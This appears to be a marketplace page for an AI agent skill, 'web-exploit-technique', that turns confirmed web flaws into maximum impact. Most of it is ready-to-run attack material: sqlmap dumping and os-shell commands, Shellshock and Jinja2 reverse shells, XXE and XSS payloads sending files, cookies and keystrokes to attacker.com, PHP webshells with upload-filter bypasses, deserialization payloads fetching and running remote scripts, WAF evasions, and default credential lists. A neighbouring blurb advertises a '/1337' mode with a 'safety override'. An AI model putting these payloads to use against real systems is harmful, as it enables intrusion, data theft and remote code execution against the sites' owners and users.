一键导入
web-exploit-technique
Auth assessment: web impact-validation; SQLi, SSTI, XXE, command injection, SSRF, XSS, uploads, deserialization, smuggling, WAF/parser checks.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
Auth assessment: web impact-validation; SQLi, SSTI, XXE, command injection, SSRF, XSS, uploads, deserialization, smuggling, WAF/parser checks.
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Drive the MCPwn Kali-backed MCP server cleanly and fast: create a session, discover tools via the catalog (list_catalog/get_tools/get_tool/run_tool) instead of guessing names, pick the right execution path (execute_command vs detach+poll_job vs interactive shell), move files with the correct mechanism (write_workspace_file, request_upload/request_download data plane, import_artifact_to_workspace, upload_to_target, list_payloads/get_payload), and bring up connectivity (tunnel_up VPN/proxy/forward, tunnel_revshell, penelope reverse shells, run_in_shell/stabilize_shell). Use whenever running MCPwn / mcpwn_* tools, a Kali MCP, or when a run stalls on timeouts, lost output, missing routes, wrong tool names, or clumsy file transfer.
Keep the context window lean when reading large data. Use before opening big files, logs, dumps, PCAPs, decompiler output, research corpora, or a folder of worker artifacts. Enforces grep-first + windowed reads, extract-don't-hoard, and context quarantine (delegate a huge read to a sub-agent that returns a digest).
Mode: /1337 - structured operator behaviour for coding and security; forces explicit reasoning, fast decisions, todos/lists, exact terms, evidence, verification, safety override.
Lab/CTF: pwn/binary challenges; native binaries, memory corruption, format strings, heap/ROP/SROP, shellcode artifacts, seccomp, kernel labs.
Auth/lab: reverse engineering methodology; malware triage, patch diffing, firmware/protocol RE, protections, exploitability handoff evidence.
Mode: /1337-brain - maintain an Obsidian vault as an AI second brain for project knowledge. Use to ingest sources, create atomic linked wiki notes, build maps of content (MOCs), answer grounded questions through a hot-cache, index, then page retrieval ladder, dedupe, audit for contradictions and dead links, keep a recent-context cache, and log changes. Prefers the Obsidian MCP (list/read/search/create/update notes); falls back to the filesystem. Assumes Obsidian and the Obsidian MCP are installed. Trigger on /1337-brain or subcommands init|ingest|ask|link|moc|dedupe|audit|project|profile|log|hot, or when the user wants to capture, organize, distill, or retrieve durable project knowledge. Markdown is the source of truth; never invent facts; preserve source paths; keep links selective.
| name | web-exploit-technique |
| description | Auth assessment: web impact-validation; SQLi, SSTI, XXE, command injection, SSRF, XSS, uploads, deserialization, smuggling, WAF/parser checks. |
| license | MIT |
| compatibility | Web applications, REST/GraphQL APIs, cloud-hosted services. |
| metadata | {"author":"AeonDave","version":"1.1","category":"offensive-techniques","language":"multi"} |
Goal: turn a confirmed web vulnerability into maximum impact — data extraction, authentication bypass, RCE, or persistent access — using the precise exploitation path for each vulnerability class.
vuln-search-technique produced confirmed web vulnerability findings.vuln-search-technique.vuln-exploit-technique.offensive-coding/ skills for BOF, shellcode, ROP.llm-technique — same HTTP surface, but exploitation model, evidence, and impact chain differ from classic web bugs.| Need | Skill / Atomic Skill |
|---|---|
| Intercept, replay, mutate requests | offensive-tools/vuln-scanners/burpsuite/ |
| SQL injection exploitation | offensive-tools/vuln-scanners/sqlmap/ |
| Command injection (scripted) | offensive-tools/web/commix/ or web-command-injection atomic |
| Reflected/DOM/Client-side XSS | offensive-tools/vuln-scanners/dalfox/, offensive-tools/web/xsstrike/ or web-reflected-xss, web-dom-xss atomics |
| Open redirect verification | web-open-redirect atomic |
| Local file inclusion (LFI) | offensive-tools/web/liffy/ or web-local-file-inclusion atomic |
| File upload to RCE | web-unrestricted-upload-rce atomic |
| Session/token analysis | web-weak-session-ids, web-client-side-token-bypass atomics |
| CSP bypass | web-csp-script-allowlist-bypass atomic |
| Backend state and app state diagnostics | web-backend-state-diagnostics atomic |
| SSRF/SSTI/JWT | offensive-tools/vuln-scanners/ssrfmap/, offensive-tools/vuln-scanners/sstimap/, offensive-tools/web/jwt-tool/ |
| Proxy/MITM and parser testing support | offensive-tools/network/mitmproxy/, offensive-tools/web/smuggler/, offensive-tools/web/corsy/ |
| Source code and backup exposure | Manual .git/backup recovery; external git-dumper only if installed |
Before exploiting, classify the confirmed web issue by class, trust boundary, and likely impact path.
burpsuite, mitmproxy), then class-specific exploitation skills (sqlmap, commix, dalfox, xsstrike, ssrfmap, sstimap, liffy, jwt-tool, smuggler, corsy) according to the confirmed surface.For parameterized, reusable workflows that isolate single vulnerability classes with minimal configuration, use these atomic skills:
| Vulnerability Class | Atomic Skill | When to use |
|---|---|---|
| Command injection (OS level) | web-command-injection | Direct-response OS command injection via GET/POST, authenticated or open |
| Reflected XSS | web-reflected-xss | User input echoed into HTML without encoding |
| DOM XSS | web-dom-xss | Client-side code reads location/query/fragment and writes to DOM sinks |
| Open redirect | web-open-redirect | Attacker-controlled URL copied into Location header |
| Local file inclusion (LFI/path traversal) | web-local-file-inclusion | User-controlled file path server-side included |
| Unrestricted upload → RCE | web-unrestricted-upload-rce | Upload endpoint trusts filename/MIME, uploaded file reachable and executable |
| Weak session IDs | web-weak-session-ids | App issues custom session cookies; entropy or incremental patterns suspected |
| Client-side token bypass | web-client-side-token-bypass | Page source computes trust token in JavaScript (ROT13, MD5, SHA1, reversal, etc.) |
| CSP allowlist bypass | web-csp-script-allowlist-bypass | CSP permits third-party hosts; attacker-controlled URL injected into script src |
| Backend state diagnostics | web-backend-state-diagnostics | App state broken (missing tables, failed reset); need reusable state checks before exploitation |
Each atomic skill accepts --base-url, field names, auth parameters, and match regexes to enable reusable exploitation workflows across different hosts, endpoints, and application configurations.
Per confirmed web vulnerability:
1. Identify class and surface (from vuln-search findings).
2. Select exploitation path for that class.
3. Verify environment conditions (WAF? Auth required? Encoding needed?).
4. Execute exploitation — minimally invasive first, escalate if needed.
5. Confirm impact: data extracted, access achieved, proof documented.
6. Assess escalation: can this chain to RCE, auth bypass, or lateral movement?
If WAF blocks: apply bypass techniques before abandoning.
If exploit fails: re-read vuln-search evidence, confirm surface is correct.
If behavior depends on parser/proxy boundaries: test protocol/parser confusion paths before concluding false positive.
From detection to data extraction to RCE:
# sqlmap — full exploit with confirmed injection point
sqlmap -u "https://target.com/page?id=1" --batch --dbs # enumerate databases
sqlmap -u "https://target.com/page?id=1" --batch -D db --tables # enumerate tables
sqlmap -u "https://target.com/page?id=1" --batch -D db -T users --dump # dump data
# POST body injection
sqlmap -u "https://target.com/login" \
--data="username=admin&password=test&submit=Login" \
--batch --dbs
# Injection in header
sqlmap -u "https://target.com/" \
--headers="X-Forwarded-For: 127.0.0.1*" \
--batch --level=3 --risk=2 --dbs
# JSON body injection
sqlmap -u "https://target.com/api/search" \
--data='{"query":"test*"}' \
--batch --level=3 --dbs
# OS command execution (MySQL/MSSQL with DBA privileges)
sqlmap -u "https://target.com/page?id=1" --os-shell --batch
# File write to webroot (MySQL + FILE privilege + known webroot)
sqlmap -u "https://target.com/page?id=1" \
--file-write=/tmp/shell.php \
--file-dest=/var/www/html/shell.php \
--batch
Manual exploitation chains — see references/injection-attacks.md.
# Auto-detect and exploit via GET parameter
commix --url "https://target.com/ping?host=127.0.0.1" --batch
# POST data
commix --url "https://target.com/exec" \
--data="ip=127.0.0.1&submit=run" --batch
# Cookie-based
commix --url "https://target.com/" \
--cookie="user=admin; cmd=ls*" --batch
# With authentication
commix --url "https://target.com/admin/exec" \
--headers="Authorization: Bearer <token>" \
--data="host=localhost" --batch
# Output filter (when only partial output visible)
commix --url "https://target.com/ping?host=127.0.0.1" \
--technique=T --batch # time-based
When a CGI endpoint is a bash script or spawns bash, HTTP headers are passed as environment variables; a payload that opens with a function definition gets executed as the web user. Hunt /cgi-bin/ targets (.sh/.cgi/.pl, classic Apache mod_cgi).
# Detect + read a file via ANY header (User-Agent, Cookie, Referer)
curl -s http://target/cgi-bin/status -H 'User-Agent: () { :;}; echo; /bin/cat /etc/passwd'
# Reverse shell (runs as the web user — then pivot to post-exploit privesc)
curl -s http://target/cgi-bin/status -H 'User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<lhost>/<lport> 0>&1'
# Confirm with nmap: nmap -p80,443 --script http-shellshock --script-args uri=/cgi-bin/status target
() { :;}; is the function-definition trick; CVE-2014-6278 is the parser bypass for partially-patched bash. Non-CGI vectors when no /cgi-bin/ exists: DHCP client hostname, OpenSSH ForceCommand/AcceptEnv, CUPS filters, and restricted-shell git/rsync.
Once engine confirmed, apply RCE payloads per engine:
# Jinja2 (Python/Flask) — RCE
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
# Jinja2 — reverse shell
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(
'bash -c "bash -i >& /dev/tcp/<lhost>/<lport> 0>&1"').read() }}
# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
# Freemarker (Java)
<#assign ex = "freemarker.template.utility.Execute"?new()>${ex("id")}
# Velocity (Java)
#set($e = "")#foreach($i in [1])$e.class.forName("java.lang.Runtime").getMethod("exec","".class).invoke($e.class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")#end
# Smarty (PHP)
{php}echo shell_exec('id');{/php}
Tool: sstimap -u "https://target.com/profile?name=*" --os-shell
See references/injection-attacks.md for full engine matrix and bypass payloads.
From confirmed SSRF to impact:
# Cloud metadata extraction (AWS — try IMDSv1 first; new EC2 instance types since mid-2024
# are IMDSv2-only, escalate via PUT-token bypass — see references/ssrf-and-xxe.md)
url=http://169.254.169.254/latest/meta-data/
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# GCP metadata (requires header in direct access — not needed via SSRF)
url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure IMDS
url=http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Internal service enumeration via SSRF
# Port scan: observe timing or response size difference
url=http://127.0.0.1:22 # SSH
url=http://127.0.0.1:6379 # Redis
url=http://127.0.0.1:8080 # Internal app
url=http://127.0.0.1:9200 # Elasticsearch (unauthenticated)
url=http://127.0.0.1:11211 # Memcached
# SSRF to internal admin panel
url=http://127.0.0.1/admin
url=http://10.0.0.1/admin
# SSRF to RCE via Redis RESP injection (if Redis accessible)
# Use Gopher:
url=gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A...
# SSRF bypass techniques
url=http://2130706433/ # 127.0.0.1 decimal
url=http://[::1]/ # IPv6 localhost
url=http://localhost.attacker.com@127.0.0.1/ # authority confusion
url=http://attacker.com#@127.0.0.1/ # fragment confusion
See references/ssrf-and-xxe.md for full bypass and escalation chains.
Confirm exposure with small, deterministic reads before reconstructing a repository or downloading large backups. Treat source disclosure as a credential and secret-harvest path, then hand cloud keys, database credentials, and CI tokens to the relevant technique skill.
# Git directory exposure
curl -s http://target/.git/HEAD
curl -s http://target/.git/config
# Reconstruct only when in scope and the tool is installed
git-dumper http://target/.git/ /tmp/repo/
# Common adjacent leaks
curl -s http://target/.env
curl -s http://target/backup/
curl -s http://target/backup.sql
If an LFI can include Apache logs and PHP executes in that context, inject a small command stub into the access log, then include the log path.
# Inject PHP via User-Agent header
curl -s http://target/page -A '<?php system($_GET["c"]); ?>'
# Include log via LFI
curl -s 'http://target/index.php?page=/var/log/apache2/access.log&c=id'
# If logs are buffered, trigger another request and retry the include
curl -s http://target/nonexistent.php -A '<?php system($_GET["c"]); ?>'
See references/lfi-and-path-traversal.md for wrappers, log-path variants, and validation controls.
<!-- Classic file read -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
<!-- Windows path -->
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!-- Blind XXE — out-of-band exfiltration -->
<!-- evil.dtd served from attacker server: -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
<!-- Reference evil.dtd in payload: -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>
<foo/>
<!-- SSRF via XXE -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
<!-- PHP wrapper (when file contains special chars) -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
# alg:none attack
# 1. Decode JWT: echo "<header>.<payload>" | base64 -d
# 2. Modify payload: change role, user_id, exp
# 3. Reconstruct: base64url(header_alg_none).base64url(new_payload). (empty sig)
# RS256 → HS256 confusion
# When public key is known/accessible:
# Sign with HMAC-SHA256 using public key bytes as secret key
# Weak secret brute-force
hashcat -a 0 -m 16500 "eyJ..." /usr/share/wordlists/rockyou.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256 jwt.txt
# kid parameter SQL injection
# kid header: {"kid": "' UNION SELECT 'secret'-- "}
# HMAC key becomes the SQL result
# jku / x5u header injection
# Point to attacker-controlled JWKS endpoint:
# {"jku": "https://attacker.com/jwks.json", ...}
# jti (nonce) reuse - token replay with the same jti
# The jti claim should be single-use. If the server accepts repeated
# tokens with the same jti, any captured token can be replayed indefinitely
# Test: send same token twice; if both succeed, jti is not enforced
# jwt_tool — automated attacks
jwt_tool -t https://target.com/api/profile -rh "Authorization: Bearer <token>" -M at
See references/auth-and-session.md for full JWT and OAuth attack chains.
For confirmed API authorization flaws, prove impact with role-tagged controls before escalating:
Use references/api-authorization-and-realtime.md for object-ID edge cases, CORS origin bypasses, and WebSocket message-level proof requirements.
Use references/advanced-web-chains.md when the confirmed weakness involves prototype pollution, race conditions, undocumented GraphQL, exploitable CORS, or SOAP/XML services. These chains require proof of impact with controls; detection hints alone are not enough.
Attacks to test in order:
1. Missing state parameter → CSRF on auth flow
2. redirect_uri not validated → code/token theft
- Try: redirect_uri=https://attacker.com
- Try: redirect_uri=https://legitimate.com.attacker.com
- Try: redirect_uri=https://legitimate.com/../../attacker.com
3. Authorization code reuse (should be one-time)
4. Token leakage in Referer header
5. Implicit flow → token in URL fragment → leaked in logs
6. scope escalation: add admin scopes to auth request
7. PKCE absent → code interception
# Cookie attribute analysis
# Secure cookie attribute: cookie sent over HTTP?
# HttpOnly: accessible via JS?
# SameSite: CSRF possible?
# Session fixation test
# Set known session ID before auth → if same ID after auth → fixation
# Credential stuffing (authorized scope only)
# Use hydra or custom script with known credential pairs
# Default credentials — common targets
# Jenkins: admin/admin or admin/(blank)
# Grafana: admin/admin
# Kibana: elastic/changeme
# Tomcat manager: tomcat/tomcat, admin/admin
# GitLab: root/5iveL!fe (older versions)
# Metabase: (setup wizard, no default)
Detection of XSS is covered in vuln-search-technique. Exploitation maximizes impact:
// Session hijack
fetch('https://attacker.com/steal?c='+document.cookie)
new Image().src='https://attacker.com/steal?c='+encodeURIComponent(document.cookie)
// Credential phishing (when SOP allows reading)
// Redirect to fake login:
window.location='https://attacker.com/phish'
// Keylogger
document.addEventListener('keydown', e => {
fetch('https://attacker.com/key?k='+e.key)
})
// Full page content exfil
fetch('https://attacker.com/page', {method:'POST', body:document.documentElement.outerHTML})
// DOM-based XSS via fragment
// URL: https://target.com/page#<img src=x onerror=fetch('//attacker.com/?c='+document.cookie)>
// CSP bypass via JSONP endpoint
<script src="https://trusted.com/api/jsonp?callback=alert(1)//"></script>
// Cookie theft with httpOnly bypass (if XSS has script execution → read DOM state)
// httpOnly cookies not readable via JS — escalate to session riding instead
// XSS to CSRF — execute state-changing requests in victim context
fetch('/api/admin/add-user', {method:'POST', body: JSON.stringify({user:'attacker',role:'admin'}),
headers:{'Content-Type':'application/json', 'X-Requested-With':'XMLHttpRequest'},
credentials:'include'})
Tool: xsstrike for payload generation and blind XSS callback setup.
See references/xss-and-client.md for CSP bypass, DOM clobbering, mutation XSS.
# PHP webshell — basic
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Access: https://target.com/uploads/shell.php?cmd=id
# Extension bypass attempts (in order)
shell.php → shell.php5 → shell.phtml → shell.pHp → shell.php.jpg
shell.php%00.jpg # null byte (older PHP)
shell.php;.jpg # semicolon (some configs)
# MIME type bypass
# Upload PHP file with Content-Type: image/jpeg
# Magic byte bypass
# Prepend valid JPEG magic bytes to PHP:
printf '\xff\xd8\xff' > shell_jpg.php
cat shell.php >> shell_jpg.php
# Double extension
shell.jpg.php # if server processes last extension
shell.php.jpg # if server processes all before last
# .htaccess upload (Apache)
# Upload .htaccess:
echo "AddType application/x-httpd-php .jpg" > .htaccess
# Then upload shell.jpg with PHP code → executed as PHP
# SVG stored XSS
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.cookie)</script>
</svg>
See references/file-upload-and-rce.md.
# Java — ysoserial gadget chains
# Enumerate available gadget chains:
java -jar ysoserial.jar
# Generate payload
java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/shell.sh | bash' > payload.ser
# Base64-encode for HTTP transport
base64 -w0 payload.ser > payload.b64
# .NET — ysoserial.net
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "whoami > /tmp/output"
# PHP — phpggc
phpggc Monolog/RCE1 system id # identify payload
# Python — pickle / PyTorch / PyYAML / joblib (no gadget library; you write the class)
python3 -c 'import pickle,os,sys;
class E:
def __reduce__(self): return (os.system, ("id > /tmp/pwn",))
sys.stdout.buffer.write(pickle.dumps(E()))' > payload.pkl
# Sinks: pickle.loads, joblib.load, numpy.load(allow_pickle=True),
# yaml.load (unsafe Loader), torch.load(..., weights_only=False)
# Deliver in:
# Java: serialized object in cookie, HTTP body, XML field
# .NET: ViewState, JSON API body, binary endpoint
# PHP: serialized cookie, POST body
# Python: raw pickle bytes, forged .pt/.pkl/.npy checkpoint, unsafe YAML doc
See references/deserialization.md.
When payloads are blocked, apply before abandoning:
# Case variation
<ScRiPt>alert(1)</ScRiPt>
sElEcT * fRoM users
# URL encoding
%3Cscript%3Ealert(1)%3C%2Fscript%3E
%27%20OR%201%3D1--
# Double encoding
%253Cscript%253E (% → %25 → second decode gives %3C → <)
# Unicode / UTF-8 variations
<script> (fullwidth chars)
' → %ef%bc%87 (fullwidth apostrophe)
# Comment injection (SQL)
SE/**/LECT * FR/**/OM users
' OR/**/1=1--
# Whitespace alternatives
SELECT%09FROM%09users (tab)
SELECT%0AFROM%0Ausers (newline)
# Parameter pollution
?id=1&id=2 OR 1=1-- (some WAFs check first occurrence only)
# Chunked Transfer Encoding (bypasses body inspection on some WAFs)
# HTTP method variation
POST → PUT, PATCH (WAF may not inspect all methods)
# Payload in unusual locations
Header injection, JSON body instead of URL, alternate content-type
See references/waf-bypass.md for class-specific bypass techniques.
When a web or FTP daemon exposes a scripting engine (Lua, Tcl, Python, custom VM) through user-controlled input — login fields, config templates, URL parameters, script terminals — injection into that engine often yields direct OS command execution.
Recognition signals:
io.popen, os.execute, exec(), subprocess called from user-reachable pathsInjection vectors:
Null-byte / delimiter escape (terminates parser context, injects new statements):
# Lua: null byte closes string, %0d is \r which WingFTP treats as newline
username=anonymous%00<injected lua>%0d--
# Typical payload structure: close current context + new statements + comment remainder
Template / format string injection:
# If input is interpolated into a script template before eval
# ${os.execute("id")} / #{`id`} / [[injected]]
Script terminal (authenticated):
-- Direct Lua RCE via admin console
local h = io.popen("id"); print(h:read("*a")); h:close()
Enumeration approach:
io.popen / os.execute (Lua), exec (Tcl), subprocess (Python)Output channels when response is XML/binary:
< or <?xml) often contains print outputcurl/wgetWhen edge and backend parse URLs/headers differently, minor input differences can bypass controls.
Typical high-impact paths:
Use references/protocol-and-parser-confusions.md for exploitation checks and escalation chains.
## Embedded scripting engine injection section above; no separate reference needed unless engine-specific quirks accumulate.